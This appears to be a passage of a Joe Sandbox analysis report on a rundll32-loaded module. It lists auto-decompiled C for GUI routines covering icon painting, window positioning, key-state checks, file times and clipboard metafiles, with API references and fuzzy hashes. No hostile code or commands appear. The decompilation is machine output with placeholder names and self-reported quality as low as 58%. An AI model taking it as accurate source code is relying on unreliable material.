                          0x02818d02
                          0x02818d05
                          0x02818d18
                          0x02818d63
                          0x02818d77
                          0x00000000
                          0x02818d89
                          0x02818d1a
                          0x02818d2a
                          0x02818d34
                          0x02818d39
                          0x02818d44
                          0x02818d4b
                          0x00000000

                          APIs
                          • IsIconic.USER32(00000000), ref: 02818D11
                          • BeginPaint.USER32(00000000,?,00000000), ref: 02818D5E
                          • DrawIcon.USER32(?,00000000,00000000,00000000), ref: 02818D77
                          • EndPaint.USER32(00000000,?,00000000,?,00000000), ref: 02818D89
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Paint$BeginDrawIconIconic
                          • String ID:
                          • API String ID: 2397676602-0
                          • Opcode ID: c3888480533ad737c2da02b796c96e81ab80a671566f9ab5bb4ea414e0b476e0
                          • Instruction ID: c6917399d0069043371acf6bfab675d31fba69c7d9b6dd71284f5bfe5871743e
                          • Opcode Fuzzy Hash: c3888480533ad737c2da02b796c96e81ab80a671566f9ab5bb4ea414e0b476e0
                          • Instruction Fuzzy Hash: 2F11A87CD00209EADB00EBA8DA85A9EB7B9AF48700F204591A914E7251E734EE45DF95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0280F83C Relevance: 6.0, APIs: 4, Instructions: 46sleepCOMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E0280F83C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x280f8b9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E0280F29C(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E0280EE9C(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E027D45A8(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x280f8c0);
				return E027D40E8( &_v8);
			}









                          0x0280f83f
                          0x0280f843
                          0x0280f847
                          0x0280f848
                          0x0280f84d
                          0x0280f850
                          0x0280f855
                          0x0280f85f
                          0x0280f861
                          0x0280f863
                          0x0280f86f
                          0x0280f87d
                          0x0280f886
                          0x0280f88f
                          0x0280f89e
                          0x0280f89e
                          0x0280f8a5
                          0x0280f8a8
                          0x0280f8ab
                          0x0280f8b8

                          APIs
                            • Part of subcall function 0280F29C: WinHelpA.USER32(00000000,0280F2B4,00000002,00000000), ref: 0280F2AB
                          • GetTickCount.KERNEL32 ref: 0280F85A
                          • Sleep.KERNEL32(00000000,00000000,0280F8B9,?,?,00000000,00000000,?,0280F832), ref: 0280F863
                          • GetTickCount.KERNEL32 ref: 0280F868
                          • WinHelpA.USER32(00000000,?,?,00000000), ref: 0280F89E
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CountHelpTick$Sleep
                          • String ID:
                          • API String ID: 2438605093-0
                          • Opcode ID: f17e0724bab5c8231e78ac59fdf2f09ecc5efe3e0927e830c63c13dc2568012e
                          • Instruction ID: eb92b49475fe3aaa04994431898ae6495f82416b7bc355be6059802b28c4c4a9
                          • Opcode Fuzzy Hash: f17e0724bab5c8231e78ac59fdf2f09ecc5efe3e0927e830c63c13dc2568012e
                          • Instruction Fuzzy Hash: C701AD3D604208AFF362EBB8DC95B5DB3AEEB18B00F618071E600D3680DB74AE008965
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281EF78 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0281EF78(intOrPtr __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char* _t15;

				_v12 = __edx;
				_v8 = __eax;
				_t15 =  *0x28644d4; // 0x2865b98
				if( *_t15 == 0) {
					if(IsIconic( *(_v8 + 0x30)) != 0) {
						InvalidateRect( *(_v8 + 0x30), 0, 0xffffffff);
					}
				} else {
					SendMessageA( *(_v8 + 0x30), 0x80, 1, E0281DED8(_v8));
					SetClassLongA( *(_v8 + 0x30), 0xfffffff2, E0281DED8(_v8));
				}
				return E0281EF28(_v8, 0xb01d);
			}






                          0x0281ef7e
                          0x0281ef81
                          0x0281ef84
                          0x0281ef8c
                          0x0281efd1
                          0x0281efde
                          0x0281efde
                          0x0281ef8e
                          0x0281efa5
                          0x0281efbc
                          0x0281efbc
                          0x0281eff2

                          APIs
                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0281EFA5
                          • SetClassLongA.USER32(?,000000F2,00000000), ref: 0281EFBC
                          • IsIconic.USER32(?), ref: 0281EFCA
                          • InvalidateRect.USER32(?,00000000,000000FF,?), ref: 0281EFDE
                            • Part of subcall function 0281DED8: LoadIconA.USER32(00000000,00007F00), ref: 0281DEFF
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ClassIconIconicInvalidateLoadLongMessageRectSend
                          • String ID:
                          • API String ID: 3567627762-0
                          • Opcode ID: 6eb797d219f293aeae77b19d75829490eecdc654770ce6cab920041ce2939b29
                          • Instruction ID: e0f0cc15be767e2d04cd0d2727fb9d073d25035b02cb1c88763681d1d7ac4815
                          • Opcode Fuzzy Hash: 6eb797d219f293aeae77b19d75829490eecdc654770ce6cab920041ce2939b29
                          • Instruction Fuzzy Hash: 15011A79A15208AFDB00EBADDA85E5D73FDAB04310F2006C4B914EB6D1CB71EE00DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D8948 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027D8948(void* __eax) {
				short _v6;
				short _v8;
				struct _FILETIME _v16;
				struct _WIN32_FIND_DATAA _v336;
				void* _t16;

				_t16 = FindFirstFileA(E027D45A8(__eax),  &_v336);
				if(_t16 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					FindClose(_t16);
					if((_v336.dwFileAttributes & 0x00000010) != 0) {
						goto L3;
					} else {
						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}








                          0x027d8963
                          0x027d896b
                          0x027d89a1
                          0x027d89a1
                          0x027d896d
                          0x027d896e
                          0x027d897a
                          0x00000000
                          0x027d897c
                          0x027d8987
                          0x027d899f
                          0x00000000
                          0x00000000
                          0x027d899f
                          0x027d897a
                          0x027d89af

                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 027D8963
                          • FindClose.KERNEL32(00000000,00000000,?), ref: 027D896E
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 027D8987
                          • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 027D8998
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FileTime$Find$CloseDateFirstLocal
                          • String ID:
                          • API String ID: 2659516521-0
                          • Opcode ID: f47e936372cdf13da450a7d11becc485ddadbc1f085a56d3bbdddaaa5cbca362
                          • Instruction ID: aaeecfdc18f9bf562b35d7b008c0c11412869bc20f1a324a0330f38686f4e51f
                          • Opcode Fuzzy Hash: f47e936372cdf13da450a7d11becc485ddadbc1f085a56d3bbdddaaa5cbca362
                          • Instruction Fuzzy Hash: 63F03C72D0021C6ACF11D7E4DD88ACFB3BC9F09324F500792A555E3191E7349B454F52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02831990 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                          Download Yara Rule
                          C-Code - Quality: 91%
                          			E02831990(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E0282DEF8(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E0282EA08(_t50, _t67);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E028318FC(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E02834254(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E02833F7C(_t50);
						_push(_t32);
						L027D6A3C();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = E0282EA08(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E027D6F90( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E0282D294(_t50,  &_v28,  &_v20);
					_t21 = E02831868(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = E0281381C(__eax);
					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E02833F7C(__eax);
						if(_t45 == GetCapture() &&  *0x2863f7c != 0) {
							_t47 =  *0x2863f7c; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x2863f7c; // 0x0
								E0282E93C(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}


















                          0x02831996
                          0x02831998
                          0x0283199a
                          0x0283199c
                          0x028319a1
                          0x028319c0
                          0x028319c3
                          0x02831aa0
                          0x02831aa7
                          0x02831af2
                          0x02831af2
                          0x02831af2
                          0x02831ae3
                          0x00000000
                          0x02831ae7
                          0x028319d1
                          0x02831a6a
                          0x02831a71
                          0x00000000
                          0x00000000
                          0x02831a77
                          0x00000000
                          0x00000000
                          0x02831a7b
                          0x02831a82
                          0x00000000
                          0x00000000
                          0x02831a87
                          0x02831a8b
                          0x02831a8e
                          0x02831a91
                          0x02831a96
                          0x02831a97
                          0x00000000
                          0x02831a97
                          0x00000000
                          0x028319d7
                          0x028319a3
                          0x02831a19
                          0x02831a22
                          0x00000000
                          0x00000000
                          0x02831a31
                          0x02831a40
                          0x02831a4d
                          0x02831a54
                          0x00000000
                          0x00000000
                          0x02831a5a
                          0x00000000
                          0x02831a5a
                          0x028319a5
                          0x028319a8
                          0x028319e3
                          0x028319e7
                          0x00000000
                          0x00000000
                          0x028319f3
                          0x028319fb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x02831a01
                          0x028319aa
                          0x028319ab
                          0x02831a0a
                          0x00000000
                          0x00000000
                          0x028319ad
                          0x028319b0
                          0x02831aad
                          0x02831abb
                          0x02831ac6
                          0x02831ace
                          0x02831ad9
                          0x02831ade
                          0x02831ade
                          0x02831ace
                          0x02831abb
                          0x028319b0

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Capture
                          • String ID:
                          • API String ID: 1145282425-3916222277
                          • Opcode ID: 554c501464acd9539b886085287412b996df7362b6811acd5b6fff50d3b5b509
                          • Instruction ID: f183c2e409517a8192e126abb9ef784a819b09cd1d03738f35b8682038821361
                          • Opcode Fuzzy Hash: 554c501464acd9539b886085287412b996df7362b6811acd5b6fff50d3b5b509
                          • Instruction Fuzzy Hash: B331B03D7006004BC722AA7CC88C71F63AA9F44B1AF04996AE45EC7685DB34D869CBF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281B2E0 Relevance: 4.6, APIs: 3, Instructions: 62windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0281B2E0(intOrPtr* __eax, signed int __ecx, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				void* __ebp;
				intOrPtr _t27;
				signed int _t47;
				void* _t55;
				void* _t62;

				_t47 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v12 + 4) != 2 ||  *((char*)(_v8 + 0x9b)) == 1 || ( *(_v8 + 0x1c) & 0x00000010) != 0 || IsIconic(E02833F7C(_v8)) != 0 || E02832A18(_v8) <= 0) {
					_t27 = E02818FC0(_v8, _t47, _v12);
				} else {
					SetWindowPos(E02833F7C(_v8), 0, 0, 0, 0, 0, 7);
					PostMessageA(E02833F7C(_v8), 0xa2,  *(_v12 + 4),  *(_v12 + 8));
					_t27 = _v8;
					if( *((char*)(_t27 + 0x22e)) != 0) {
						_t27 = E0282DE30(E02832A2C(_v8, 0), _t47 | 0xffffffff, 1, _t55, _t62);
					}
				}
				return _t27;
			}










                          0x0281b2e0
                          0x0281b2e6
                          0x0281b2e9
                          0x0281b2f3
                          0x0281b393
                          0x0281b330
                          0x0281b345
                          0x0281b366
                          0x0281b36b
                          0x0281b375
                          0x0281b386
                          0x0281b386
                          0x0281b375
                          0x0281b39b

                          APIs
                          • IsIconic.USER32(00000000), ref: 0281B31B
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000007,00000000), ref: 0281B345
                          • PostMessageA.USER32(00000000,000000A2,00000002,?), ref: 0281B366
                            • Part of subcall function 0282DE30: GetCursorPos.USER32 ref: 0282DE94
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CursorIconicMessagePostWindow
                          • String ID:
                          • API String ID: 3700078965-0
                          • Opcode ID: 5a773d7c63922b8ef055f25f8013be679797980a333df81054facad69327108b
                          • Instruction ID: 7c0f55684f2defa63b68b9a5607d40f6a13a4763c2c4c062da36cc32d3cf3263
                          • Opcode Fuzzy Hash: 5a773d7c63922b8ef055f25f8013be679797980a333df81054facad69327108b
                          • Instruction Fuzzy Hash: 0C11193CA04208EBDB11EBACD949B9DBBFAAF04314F144194E458EB2A1C730EE509B81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02819B0C Relevance: 4.6, APIs: 3, Instructions: 62keyboardCOMMON
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E02819B0C(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t30;
				void* _t33;
				short _t34;

				_v12 = __edx;
				_v8 = __eax;
				if(GetKeyState(0x12) < 0) {
					L12:
					_t30 = E028333F8();
				} else {
					_t33 =  *((intOrPtr*)(_v12 + 4)) - 9;
					if(_t33 == 0) {
						_t34 = GetKeyState(0x11);
						__eflags = _t34;
						if(_t34 < 0) {
							goto L12;
						} else {
							__eflags = GetKeyState(0x10);
							E02834484( *((intOrPtr*)(_v8 + 0x220)), GetKeyState(0x10), 1);
							_t30 = _v12;
							 *((intOrPtr*)(_t30 + 0xc)) = 1;
						}
					} else {
						if(_t33 + 0xffffffe4 - 4 < 0) {
							_t30 = _v8;
							__eflags =  *((intOrPtr*)(_t30 + 0x220));
							if( *((intOrPtr*)(_t30 + 0x220)) != 0) {
								_push(0);
								__eflags =  *((short*)(_v12 + 4)) - 0x27;
								if(__eflags != 0) {
									__eflags =  *((short*)(_v12 + 4)) - 0x28;
									if(__eflags == 0) {
										goto L10;
									} else {
									}
								}
								E02834484( *((intOrPtr*)(_v8 + 0x220)), __eflags);
								_t30 = _v12;
								 *((intOrPtr*)(_t30 + 0xc)) = 1;
							}
						} else {
							goto L12;
						}
					}
				}
				return _t30;
			}








                          0x02819b12
                          0x02819b15
                          0x02819b22
                          0x02819bc9
                          0x02819bcf
                          0x02819b28
                          0x02819b2f
                          0x02819b33
                          0x02819b45
                          0x02819b4a
                          0x02819b4d
                          0x00000000
                          0x02819b4f
                          0x02819b58
                          0x02819b6a
                          0x02819b6f
                          0x02819b72
                          0x02819b72
                          0x02819b35
                          0x02819b3c
                          0x02819b7b
                          0x02819b7e
                          0x02819b85
                          0x02819b87
                          0x02819b8c
                          0x02819b91
                          0x02819b96
                          0x02819b9b
                          0x00000000
                          0x02819b9d
                          0x02819b9d
                          0x02819b9b
                          0x02819bb8
                          0x02819bbd
                          0x02819bc0
                          0x02819bc0
                          0x02819b3e
                          0x00000000
                          0x02819b3e
                          0x02819b3c
                          0x02819b33
                          0x02819bd7

                          APIs
                          • GetKeyState.USER32(00000012), ref: 02819B1A
                          • GetKeyState.USER32(00000011), ref: 02819B45
                          • GetKeyState.USER32(00000010), ref: 02819B53
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: State
                          • String ID:
                          • API String ID: 1649606143-0
                          • Opcode ID: 83b963df34586b64362dadd7a6af4fa97761b13f2c04727c483f8fe9f844c171
                          • Instruction ID: ca2e11dc96886728432e46f36f864866d416ec03c7796fb306a1aee3e2014c29
                          • Opcode Fuzzy Hash: 83b963df34586b64362dadd7a6af4fa97761b13f2c04727c483f8fe9f844c171
                          • Instruction Fuzzy Hash: CD215E3C514218EFDB04DB98D599EDCB7F9AB04768F1481A4E804AB3E2D7719A80DF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02818FC0 Relevance: 4.6, APIs: 3, Instructions: 60windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E02818FC0(intOrPtr* __eax, signed int __ecx, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				void* __ebp;
				intOrPtr _t28;
				signed int _t47;
				void* _t56;
				void* _t62;

				_t47 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v12 + 4) != 2 ||  *((char*)(_v8 + 0x9b)) != 1 || ( *(_v8 + 0x1c) & 0x00000010) != 0 || IsIconic(E02833F7C(_v8)) != 0) {
					_t28 = E0282EE58(_v8, _v12);
				} else {
					SetWindowPos(E02833F7C(_v8), 0, 0, 0, 0, 0, 7);
					PostMessageA(E02833F7C(_v8), 0xa2,  *(_v12 + 4),  *(_v12 + 8));
					_t28 = _v8;
					if( *((char*)(_t28 + 0x22e)) != 0) {
						_t28 = E0282DE30(_v8, _t47 | 0xffffffff,  *((intOrPtr*)( *_v8 + 0x54))() ^ 0x00000001, _t56, _t62);
					}
				}
				return _t28;
			}










                          0x02818fc0
                          0x02818fc6
                          0x02818fc9
                          0x02818fd3
                          0x02819067
                          0x02819000
                          0x02819015
                          0x02819036
                          0x0281903b
                          0x02819045
                          0x0281905a
                          0x0281905a
                          0x02819045
                          0x0281906f

                          APIs
                          • IsIconic.USER32(00000000), ref: 02818FF7
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000007,00000000), ref: 02819015
                          • PostMessageA.USER32(00000000,000000A2,00000002,?), ref: 02819036
                            • Part of subcall function 0282DE30: GetCursorPos.USER32 ref: 0282DE94
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CursorIconicMessagePostWindow
                          • String ID:
                          • API String ID: 3700078965-0
                          • Opcode ID: 74c4f82a9f44f4ef942f3766c6bbe2430632ee34c5350a237484cc1c3887a7aa
                          • Instruction ID: afb5ed0e05ac317b23c89f33f47d39dcfb08ff4b80cc3498726bf2e35e97771c
                          • Opcode Fuzzy Hash: 74c4f82a9f44f4ef942f3766c6bbe2430632ee34c5350a237484cc1c3887a7aa
                          • Instruction Fuzzy Hash: B811EC38E04248EFDB10EBA8D549B9DBBFAAF04710F1441D4E548EB292C771EE80DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028194AC Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E028194AC(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				void* _t31;
				intOrPtr _t40;

				_v12 = __edx;
				_v8 = __eax;
				_t31 =  *((intOrPtr*)(_v12 + 8)) - 1;
				if(_t31 == 0) {
					if(IsIconic(E02833F7C(_v8)) == 0) {
						if(IsZoomed(E02833F7C(_v8)) == 0) {
							 *(_v8 + 0x22c) = 1;
						} else {
							 *(_v8 + 0x22c) = 3;
						}
					} else {
						 *(_v8 + 0x22c) = 2;
					}
					_t40 =  *((intOrPtr*)( *_v8 - 0x10))();
				} else {
					if(_t31 == 2) {
						_t40 = _v8;
						if( *((char*)(_t40 + 0x22c)) != 0) {
							ShowWindow(E02833F7C(_v8),  *(0x2863cf0 + ( *(_v8 + 0x22c) & 0x000000ff) * 4));
							_t40 = _v8;
							 *((char*)(_t40 + 0x22c)) = 0;
						}
					} else {
						_t40 =  *((intOrPtr*)( *_v8 - 0x10))();
					}
				}
				return _t40;
			}







                          0x028194b2
                          0x028194b5
                          0x028194be
                          0x028194bf
                          0x028194db
                          0x028194f9
                          0x0281950a
                          0x028194fb
                          0x028194fe
                          0x028194fe
                          0x028194dd
                          0x028194e0
                          0x028194e0
                          0x02819519
                          0x028194c1
                          0x028194c4
                          0x0281951e
                          0x02819528
                          0x02819545
                          0x0281954a
                          0x0281954d
                          0x0281954d
                          0x028194c6
                          0x0281955e
                          0x0281955e
                          0x028194c4
                          0x02819564

                          APIs
                          • IsIconic.USER32(00000000), ref: 028194D4
                          • ShowWindow.USER32(00000000,00000000), ref: 02819545
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: IconicShowWindow
                          • String ID:
                          • API String ID: 3061500023-0
                          • Opcode ID: d0d58af80464386163017bf089067f795f8357ce87336da465dbf1b41714c2ab
                          • Instruction ID: a0af7ab874747587170b50c0f5d6f8fa4e052af39b8274a7450f3a575d624cda
                          • Opcode Fuzzy Hash: d0d58af80464386163017bf089067f795f8357ce87336da465dbf1b41714c2ab
                          • Instruction Fuzzy Hash: 8A21C93C904148EFDB01EBA9D559AADBBF9AF09304F2440E5E808EB292D730EE40DF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027FB3B4 Relevance: 4.6, APIs: 3, Instructions: 51fileclipboardCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027FB3B4(intOrPtr* __eax, void* __ecx, void* __edx) {
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct tagENHMETAHEADER _v104;
				void* __ebp;
				intOrPtr _t35;
				intOrPtr* _t37;
				struct HENHMETAFILE__* _t43;
				intOrPtr _t44;

				_t37 = __eax;
				_t43 = GetClipboardData(0xe);
				if(_t43 == 0) {
					_t35 =  *0x28645e0; // 0x27f538c
					E027F87AC(_t35);
				}
				E027FAB54(_t37);
				_t44 =  *((intOrPtr*)(_t37 + 0x28));
				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
				 *((short*)(_t44 + 0x18)) = 0;
				 *((char*)(_t37 + 0x2c)) = 1;
				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
				return  *((intOrPtr*)( *_t37 + 0x10))();
			}












                          0x027fb3bd
                          0x027fb3c6
                          0x027fb3ca
                          0x027fb3cc
                          0x027fb3d1
                          0x027fb3d1
                          0x027fb3d8
                          0x027fb3dd
                          0x027fb3e8
                          0x027fb3f5
                          0x027fb400
                          0x027fb409
                          0x027fb40c
                          0x027fb412
                          0x027fb422
                          0x027fb434

                          APIs
                          • GetClipboardData.USER32(0000000E), ref: 027FB3C1
                          • CopyEnhMetaFileA.GDI32(00000000,00000000), ref: 027FB3E3
                          • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000), ref: 027FB3F5
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FileMeta$ClipboardCopyDataHeader
                          • String ID:
